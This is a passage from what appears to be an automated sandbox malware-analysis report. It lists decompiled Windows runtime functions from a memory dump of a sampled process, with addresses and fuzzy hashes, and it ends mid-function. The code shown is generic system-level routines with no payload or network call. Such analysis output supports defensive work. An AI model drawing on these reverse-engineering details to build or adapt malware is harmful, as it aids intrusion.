                                                    0x00a98a85
                                                    0x00a98a86
                                                    0x00a98a89
                                                    0x00a98a93
                                                    0x00a98a99
                                                    0x00a98a9b
                                                    0x00000000
                                                    0x00a98aaf
                                                    0x00a98abe
                                                    0x00a98ac3
                                                    0x00a98acb
                                                    0x00a98ad7
                                                    0x00a98ae0
                                                    0x00a98af1
                                                    0x00000000
                                                    0x00a98af1
                                                    0x00a98acd
                                                    0x00a98ad5
                                                    0x00a98afb
                                                    0x00a98afd
                                                    0x00a98aff
                                                    0x00a98b07
                                                    0x00a98b22
                                                    0x00a98b24
                                                    0x00a98b2a
                                                    0x00a98b2e
                                                    0x00a98b3f
                                                    0x00a98b78
                                                    0x00a98b41
                                                    0x00a98b52
                                                    0x00a98b54
                                                    0x00a98b5c
                                                    0x00a98b74
                                                    0x00a98b74
                                                    0x00a98b5c
                                                    0x00a98b3f
                                                    0x00a98b5e
                                                    0x00a98b61
                                                    0x00a98b64
                                                    0x00a98b64
                                                    0x00a98b6c
                                                    0x00a98b6c
                                                    0x00a98b11
                                                    0x00ae9cd5
                                                    0x00ae9cd5
                                                    0x00a98b17
                                                    0x00a98b1a
                                                    0x00a98b1a
                                                    0x00000000
                                                    0x00a98ad5
                                                    0x00a98a89

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aafc9a1beca58ec5249975ccba2c91498b818ae50eeb43774e857afd5ce45fbf
                                                    • Instruction ID: 4384084042022a600e186b3c22d5e0da2c02a3581bb8bba1a56bd5a6bef8b814
                                                    • Opcode Fuzzy Hash: aafc9a1beca58ec5249975ccba2c91498b818ae50eeb43774e857afd5ce45fbf
                                                    • Instruction Fuzzy Hash: 544180B5B0022C9BDF24DF15CC88AAAB3F8EB55340F1541EAE81997242EB749E80CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B069A6 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00B069A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0xb7d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00A96C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00B06BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E00AC9980() >= 0) {
							E00AA2280(_t56, 0xb78778);
							_t77 = 1;
							_t68 = 1;
							if( *0xb78774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0xb78774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00A8B6F0(0xa6c338, 0xa6c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E00AC9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E00AC95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00A9FFB0(_t68, _t77, 0xb78778);
				}
				_pop(_t78);
				return E00ACB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                    0x00b069b5
                                                    0x00b069be
                                                    0x00b069c3
                                                    0x00b069c9
                                                    0x00b069cc
                                                    0x00b069d1
                                                    0x00b069d3
                                                    0x00b069de
                                                    0x00b069e1
                                                    0x00b069ea
                                                    0x00b069f6
                                                    0x00b069fe
                                                    0x00b06a13
                                                    0x00b06a14
                                                    0x00b06a15
                                                    0x00b06a16
                                                    0x00b06a1e
                                                    0x00b06a26
                                                    0x00b06a31
                                                    0x00b06a36
                                                    0x00b06a37
                                                    0x00b06a40
                                                    0x00b06a49
                                                    0x00b06a4a
                                                    0x00b06a53
                                                    0x00b06a59
                                                    0x00b06a5d
                                                    0x00b06a5e
                                                    0x00b06a64
                                                    0x00b06a67
                                                    0x00b06a6a
                                                    0x00b06a6d
                                                    0x00b06a70
                                                    0x00b06a77
                                                    0x00b06a7d
                                                    0x00b06a86
                                                    0x00b06a89
                                                    0x00b06a9c
                                                    0x00b06a9f
                                                    0x00b06aa2
                                                    0x00b06aa5
                                                    0x00b06aaf
                                                    0x00b06ab1
                                                    0x00b06ab8
                                                    0x00b06ab9
                                                    0x00b06abb
                                                    0x00b06abe
                                                    0x00b06ac5
                                                    0x00b06ac5
                                                    0x00b06aaf
                                                    0x00b06a40
                                                    0x00b06a26
                                                    0x00b069fe
                                                    0x00b06ace
                                                    0x00b06ad0
                                                    0x00b06ad3
                                                    0x00b06ad8
                                                    0x00b06adf
                                                    0x00b06adf
                                                    0x00b06ae8
                                                    0x00b06aef
                                                    0x00b06aef
                                                    0x00b06af9
                                                    0x00b06b06

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 283926a837c8f90d4290ebc7b1e0232e4725168884e5755ba8d76d9a48888d7a
                                                    • Instruction ID: 453ac4f3dda3d5542c5af7ca1e8e5842cbd50a2de79fb47438462c20fb0f0eb8
                                                    • Opcode Fuzzy Hash: 283926a837c8f90d4290ebc7b1e0232e4725168884e5755ba8d76d9a48888d7a
                                                    • Instruction Fuzzy Hash: C6417CB1E0020CAFDB14DFA5D941BFEBBF8EF48714F14856AE819A7291EB709905CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A85210 Relevance: .1, Instructions: 107COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00A85210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00A852A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00AC95D0();
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00A9EB70(_t54, 0xb779a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E00AC95D0();
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00A9EB70(_t54, 0xb779a0);
						}
						return _t52;
					}
					L5:
					_t33 = E00ACF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00A9EB70(_t54, 0xb779a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E00AC95D0();
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                    0x00a85220
                                                    0x00a85224
                                                    0x00ae0d13
                                                    0x00ae0d16
                                                    0x00ae0d19
                                                    0x00a8522a
                                                    0x00a8522a
                                                    0x00a8522d
                                                    0x00a8522d
                                                    0x00a85231
                                                    0x00a85235
                                                    0x00a85239
                                                    0x00ae0d5c
                                                    0x00ae0d62
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae0d6a
                                                    0x00ae0d7b
                                                    0x00ae0d7f
                                                    0x00ae0d81
                                                    0x00ae0d84
                                                    0x00ae0d95
                                                    0x00ae0d95
                                                    0x00ae0d6c
                                                    0x00ae0d71
                                                    0x00ae0d71
                                                    0x00ae0d9a
                                                    0x00000000
                                                    0x00a8524a
                                                    0x00a8524a
                                                    0x00a85250
                                                    0x00ae0d24
                                                    0x00ae0d35
                                                    0x00ae0d39
                                                    0x00ae0d3b
                                                    0x00ae0d3e
                                                    0x00ae0d50
                                                    0x00ae0d50
                                                    0x00ae0d26
                                                    0x00ae0d2b
                                                    0x00ae0d2b
                                                    0x00000000
                                                    0x00ae0d55
                                                    0x00a85256
                                                    0x00a8525b
                                                    0x00a85265
                                                    0x00ae0da7
                                                    0x00a8526b
                                                    0x00a8526e
                                                    0x00a85272
                                                    0x00ae0db1
                                                    0x00ae0db4
                                                    0x00ae0dc5
                                                    0x00ae0dc5
                                                    0x00a85272
                                                    0x00a85278
                                                    0x00a8527e
                                                    0x00a8528a
                                                    0x00a8528c
                                                    0x00a8528d
                                                    0x00000000
                                                    0x00a85280
                                                    0x00a85282
                                                    0x00a85288
                                                    0x00a8529f
                                                    0x00a85292
                                                    0x00000000
                                                    0x00a85292
                                                    0x00000000
                                                    0x00a85288
                                                    0x00a8527e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5fcaf3169aa6fc53ed5bced62665567e6506157905873c44b607ac8a847172b5
                                                    • Instruction ID: dc767f5a6f478a1a509516660588a82b3b7a61f98710bfe5b4c5265bf45ebff5
                                                    • Opcode Fuzzy Hash: 5fcaf3169aa6fc53ed5bced62665567e6506157905873c44b607ac8a847172b5
                                                    • Instruction Fuzzy Hash: C831E731645A40EBCB26AB69CD81FB677B5FF10760F218619F8594B5E1EBB0EC40C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC3D43 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AC3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00A97B60(0, _t61, 0xa611c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00A97B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00AA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                    0x00ac3d4c
                                                    0x00ac3d50
                                                    0x00ac3d55
                                                    0x00ac3d5e
                                                    0x00afe79a
                                                    0x00000000
                                                    0x00afe79a
                                                    0x00ac3d68
                                                    0x00afe789
                                                    0x00ac3d9d
                                                    0x00ac3da3
                                                    0x00ac3daf
                                                    0x00ac3db5
                                                    0x00ac3dbc
                                                    0x00ac3dc4
                                                    0x00ac3dc9
                                                    0x00ac3dce
                                                    0x00afe7ae
                                                    0x00afe7ae
                                                    0x00ac3dde
                                                    0x00ac3de2
                                                    0x00ac3de7
                                                    0x00ac3e0d
                                                    0x00ac3e13
                                                    0x00ac3e16
                                                    0x00ac3e1e
                                                    0x00ac3e25
                                                    0x00ac3e28
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac3e2a
                                                    0x00ac3e2f
                                                    0x00ac3e37
                                                    0x00ac3e37
                                                    0x00000000
                                                    0x00ac3e37
                                                    0x00ac3e31
                                                    0x00000000
                                                    0x00ac3e31
                                                    0x00ac3e20
                                                    0x00ac3e20
                                                    0x00ac3e35
                                                    0x00000000
                                                    0x00ac3de9
                                                    0x00ac3de9
                                                    0x00ac3de9
                                                    0x00ac3dee
                                                    0x00ac3dfd
                                                    0x00ac3dff
                                                    0x00ac3e02
                                                    0x00ac3e05
                                                    0x00ac3e05
                                                    0x00000000
                                                    0x00ac3df0
                                                    0x00ac3de7
                                                    0x00afe78f
                                                    0x00afe794
                                                    0x00ac3d79
                                                    0x00ac3d84
                                                    0x00ac3d89
                                                    0x00ac3d8e
                                                    0x00000000
                                                    0x00afe7a4
                                                    0x00ac3d96
                                                    0x00ac3d9a
                                                    0x00000000
                                                    0x00ac3d9a
                                                    0x00000000
                                                    0x00afe794
                                                    0x00ac3d6e
                                                    0x00ac3d73
                                                    0x00000000
                                                    0x00afe7b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca01ce59e9a6e8ff6e054424640daf01844eb116e5ebbb83d0bdd071476af872
                                                    • Instruction ID: 8d1f8244c9264db861a2d0c9d737ea87c95a9c8cb583ccd2e83cd60b1394507a
                                                    • Opcode Fuzzy Hash: ca01ce59e9a6e8ff6e054424640daf01844eb116e5ebbb83d0bdd071476af872
                                                    • Instruction Fuzzy Hash: 9B319C32A046149BCB25DF2AC841F7ABBF5EF59710B1AC46EE846CB260E730DD41D790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABA61C Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00ABA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0xb60220);
				E00ADD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0xb77b9c; // 0x0
				_t55 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E00ADD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0xb77b10 =  *0xb77b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0xb7536c; // 0x771a5368
					if( *_t51 != 0xb75368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0xb75368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0xb7536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E00ABA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                    0x00aba61c
                                                    0x00aba61e
                                                    0x00aba623
                                                    0x00aba628
                                                    0x00aba62b
                                                    0x00aba62d
                                                    0x00aba648
                                                    0x00aba64a
                                                    0x00aba64f
                                                    0x00af9b44
                                                    0x00aba6ec
                                                    0x00aba6f1
                                                    0x00aba6f1
                                                    0x00aba655
                                                    0x00aba657
                                                    0x00aba65a
                                                    0x00aba65d
                                                    0x00aba662
                                                    0x00aba663
                                                    0x00aba667
                                                    0x00aba668
                                                    0x00aba66d
                                                    0x00aba706
                                                    0x00aba706
                                                    0x00af9bda
                                                    0x00af9be6
                                                    0x00af9beb
                                                    0x00000000
                                                    0x00af9beb
                                                    0x00aba679
                                                    0x00af9b7a
                                                    0x00000000
                                                    0x00af9b7a
                                                    0x00aba683
                                                    0x00aba6f4
                                                    0x00aba6f7
                                                    0x00aba6f9
                                                    0x00aba6fd
                                                    0x00aba6a0
                                                    0x00aba6a0
                                                    0x00aba6ad
                                                    0x00aba6af
                                                    0x00aba6b4
                                                    0x00af9ba7
                                                    0x00af9bac
                                                    0x00000000
                                                    0x00000000
                                                    0x00af9bc6
                                                    0x00af9bce
                                                    0x00af9bd1
                                                    0x00af9bd3
                                                    0x00af9bd3
                                                    0x00000000
                                                    0x00af9bd1
                                                    0x00aba6bd
                                                    0x00aba6c3
                                                    0x00aba6c6
                                                    0x00aba6d2
                                                    0x00aba701
                                                    0x00aba704
                                                    0x00000000
                                                    0x00aba704
                                                    0x00aba6d4
                                                    0x00aba6d6
                                                    0x00aba6d9
                                                    0x00aba6db
                                                    0x00aba6e1
                                                    0x00aba6e6
                                                    0x00aba6e8
                                                    0x00aba6e8
                                                    0x00aba6ea
                                                    0x00000000
                                                    0x00aba6ea
                                                    0x00aba688
                                                    0x00aba692
                                                    0x00aba694
                                                    0x00aba699
                                                    0x00000000
                                                    0x00000000
                                                    0x00aba69d
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 738e33e2929bb4e789f799c561b2eca0d624fa8ccab820fdd686db62bbc92a18
                                                    • Instruction ID: 05ed141e0baab6c4d534989f037828b4b17ec78b6b8d1d959004fd59291ebf4d
                                                    • Opcode Fuzzy Hash: 738e33e2929bb4e789f799c561b2eca0d624fa8ccab820fdd686db62bbc92a18
                                                    • Instruction Fuzzy Hash: D94179B5A04209DFCB14CF58D890BAABBF5FB59300F1980AAE909AB351DB74AD41CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B07016 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00B07016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0xb7d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E00B06B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E00B06B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E00AA7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E00AC9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E00ACB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L00AA4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                    0x00b07016
                                                    0x00b0701e
                                                    0x00b0702b
                                                    0x00b07033
                                                    0x00b07037
                                                    0x00b0703c
                                                    0x00b0703e
                                                    0x00b07041
                                                    0x00b07045
                                                    0x00b0704a
                                                    0x00b07050
                                                    0x00b07055
                                                    0x00b0705a
                                                    0x00b07062
                                                    0x00b07062
                                                    0x00b0705a
                                                    0x00b07064
                                                    0x00b07064
                                                    0x00b07067
                                                    0x00b07071
                                                    0x00b07096
                                                    0x00b0709b
                                                    0x00b070a2
                                                    0x00b070a6
                                                    0x00b070a7
                                                    0x00b070ad
                                                    0x00b070b3
                                                    0x00b070b6
                                                    0x00b070bb
                                                    0x00b070c3
                                                    0x00b070c3
                                                    0x00b070c6
                                                    0x00b070cd
                                                    0x00b070dd
                                                    0x00b070e0
                                                    0x00b070e2
                                                    0x00b070e2
                                                    0x00b070ee
                                                    0x00b07101
                                                    0x00b070f0
                                                    0x00b070f9
                                                    0x00b070f9
                                                    0x00b0710a
                                                    0x00b0710e
                                                    0x00b07112
                                                    0x00b07117
                                                    0x00b07118
                                                    0x00b07118
                                                    0x00b070bb
                                                    0x00b0711d
                                                    0x00b07123
                                                    0x00b07131
                                                    0x00b07131
                                                    0x00b07136
                                                    0x00b0713d
                                                    0x00b0713e
                                                    0x00b0713f
                                                    0x00b0714a
                                                    0x00b0714a
                                                    0x00b07084
                                                    0x00b07088
                                                    0x00000000
                                                    0x00b0708e
                                                    0x00b0708e
                                                    0x00b07092
                                                    0x00000000
                                                    0x00b07092

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0b5c7c97cf0c913c4190930a76b967ce6242f883631619936b847bde12cadec
                                                    • Instruction ID: 62a75bca1e15dc1db15b01ed7ae6a2dd63c40730ef7fcd213ba06067c39cb044
                                                    • Opcode Fuzzy Hash: e0b5c7c97cf0c913c4190930a76b967ce6242f883631619936b847bde12cadec
                                                    • Instruction Fuzzy Hash: 12319372A087519BC320DF28C941A6AB7E5FF88700F054A69F895976D1EB30E914C7A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AAC182 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00AAC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00AA7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
